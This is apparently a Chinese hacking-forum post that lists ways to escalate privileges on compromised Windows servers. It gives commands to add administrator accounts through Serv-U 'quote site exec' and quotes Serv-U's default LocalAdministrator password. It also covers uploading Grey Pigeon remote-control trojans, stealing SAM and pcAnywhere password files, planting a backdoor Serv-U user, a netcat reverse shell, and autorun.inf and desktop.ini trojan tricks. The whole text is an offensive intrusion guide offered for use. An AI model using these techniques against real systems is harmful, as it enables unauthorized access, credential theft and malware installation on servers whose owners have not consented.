一:檢測一下網(wǎng)站的服務器是否開了 3389 遠程終端
二:檢測一下服務是否用了serv-u (還有是什么版本的)
方法
一:復制一個網(wǎng)站 用 3389 登陸器連接一下 (是否成功)能連接了,拿下服務器的機率,提高 30%了
二:用ftp模式查下一個服務器的版本
開始 -- 運行 -- cmd -- ftp (加你要登陸的網(wǎng)站)
--------------------------------------------------------------------------------
第一步:最簡單的方法
看有沒有權(quán)限,能不能執(zhí)行命令,行的話直接傳個鴿子(隨便什么遠程控制木馬都行,成功率極低.
--------------------------------------------------------------------------------
第二步::尋找有執(zhí)行的權(quán)限目錄
c:\\\\winnt\\\\system32\\\\inetsrv\\\\data\\\\
c:\\\\Documents And Settings\\\\All Users\\\\
c:\\\\Program Files\\\\serv-u\\\\
C:\\\\Program Files\\\\Microsoft SQL Server\\\\
這樣的目錄可以直接上傳鴿子,運行
-----------------------------------------------------------------------------------
第三步:傳個cmd和開帳號的ftp.exe上去直接加帳號,命令就是你上傳目錄D:\\\\VMware Workstation\\\\cmd.exe \\"net user love love /add\\"
-----------------------------------------------------------------------------------
第四步:asp提權(quán)木馬直接提權(quán)
serv-u 6.3 版本 好象用asp提權(quán)木馬(不成功)
serv-u 6.2 版本 好象可以
不過提權(quán)能不能用asp木馬還要看服務器,設置的變態(tài)不,假設直接用asp提權(quán)成功之后,還是不成功,但是可以在 cmd之下 用這個帳號連接一下ftp (加你提權(quán)的網(wǎng)站)
帳號:LocalAdministrator 密碼:$ak#.1k;0@p\\"〉#1@$ak#.1k;0@p
如果成功連接后就可以直接添加管理員帳號了
命令:quote site exec (你添加的帳號) net user 123 123 /ad
quote site exec (把帳號提升到最高權(quán)限) net localgroup administartors 123 /add
---------------------------------------------------------------------------------------
第五步:pcaanywhere
C:\\\\Documents And Settings\\\\All Users\\\\Application Data\\\\Symantec\\\\pcAnywhere\\\\
這里下他的GIF文件,在本地安裝pcanywhere上去
---------------------------------------------------------------------------------------
第六步:serv-u覆蓋提權(quán)
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini
網(wǎng)上很多教程
----------------------------------------------------------------------------------------
第七步:Serv-U轉(zhuǎn)發(fā)端口
給Latte加鹽 曾經(jīng)做個一個(serv-u經(jīng)典提權(quán)全套教程)用到過這個方法,可以學習一下
上傳個端口轉(zhuǎn)發(fā)工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個服務器,IP填對方IP,帳號為LocalAdministrator 密碼為$ak#.1k;0@p\\"〉#1@$ak#.1k;0@p
連接上后你就可以管理他的Serv-u了
-----------------------------------------------------------------------------------------
第八步:社會工程學之提升提權(quán)
把灰鴿子傳到上面,然后轉(zhuǎn)移到c盤,就等著管理員運行了,前提你的鴿子必須免殺讓我看到一個不清楚的exe程序,老想點開看看,呵呵(方法比較笨)
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳轉(zhuǎn)到這個目錄,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密碼,登陸
C:\WINNT\system32\config進這里下它的SAM,破解用戶的密碼
c:\winnt\repaire 下是備份用到破解sam密碼的軟件有LC,SAMinside
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這里能不能跳轉(zhuǎn),我們從這里可以獲取好多有用的信息比如Serv-U的路徑,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉(zhuǎn)到這個目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸
c:\Program Files\serv-u\
C:\WINNT\system32\config\
下它的SAM,破解密碼
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多時候沒作限制,把提升權(quán)限的工具上傳上去,然后執(zhí)行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服務器支持PHP)
c:\PHP(如果服務器支持PHP)
運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權(quán)限
還可以用這段代碼試提升,好象不是很理想的,如果主機設置很變態(tài),可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs等木馬。
根目錄下隱藏autorun.inf
C:\PROGRAM FILES\KV2004\ 綁
D:\PROGRAM FILES\RISING\RAV\
C:\Program Files\Real\RealServer\
rar
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下
replace 替換法 捆綁腳本 編寫一個啟動/關機腳本 重起
刪SAM :( 錯
CAcls命令
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak
Ring的權(quán)限提升21大法!
以下全部是本人提權(quán)時候的總結(jié) 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過的。本人不才,除了第一種方法自己研究的,其他的都是別人的經(jīng)驗總結(jié)。希望對朋友有幫助!
1.radmin連接法
條件是你權(quán)限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去。本人從來米成功過。,端口到是給對方打開了。
2.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF文件,在本地安裝pcanywhere上去
3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之
4.SU密碼奪取
C:\Documents and Settings\All Users\「開始」菜單\程序\
引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉(zhuǎn)進去后,如果有權(quán)限修改ServUDaemon.ini,加個用戶上去,密碼為空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
這個用戶具有最高權(quán)限,然后我們就可以ftp上去 quote site exec xxx 來提升權(quán)限
5.c:\winnt\system32\inetsrv\data\
引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權(quán)限的工具上傳上去,然后執(zhí)行
6.SU溢出提權(quán)
這個網(wǎng)上教程N多 不詳細講解了
7.運行Csript
引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權(quán)限
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特權(quán)的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權(quán)一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)
我們現(xiàn)在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了
8.腳本提權(quán)
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs
9.VNC
這個是小花的文章 HOHO
默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password
我們可以用vncx4破解它,vncx4使用很簡單,只要在命令行下輸入c:\>vncx4 -W 然后順序輸入上面的每一個十六進制數(shù)據(jù),沒輸完一個回車一次就行了。
10.NC提權(quán)
給對方來個NC 但是條件是你要有足夠的運行權(quán)限 然后把它反彈到自己的電腦上 HOHO OK了
11.社會工程學之GUEST提權(quán)
很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵箱號 手機號 盡量看看 HOHO
12.IPC空連接
如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令
13.替換服務
這個不用說了吧?個人感覺相當復雜
14.autorun .inf
autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統(tǒng)、隱藏屬性 傳到哪個盤都可以的 不相信他不運行
15.desktop.ini與Folder.htt
引用:首先,我們現(xiàn)在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇"自定義文件夾"(xp好像是不行的)一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder setting的文件架與desktop.ini的文件,(如果你看不到,先取消"隱藏受保護的操作系統(tǒng)文件")然后我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼:然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執(zhí)行了我們的后門
16.su覆蓋提權(quán)
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重起一下Serv-U,于是你上面的所有配置都與他的一模一樣了
| 
大家都在看
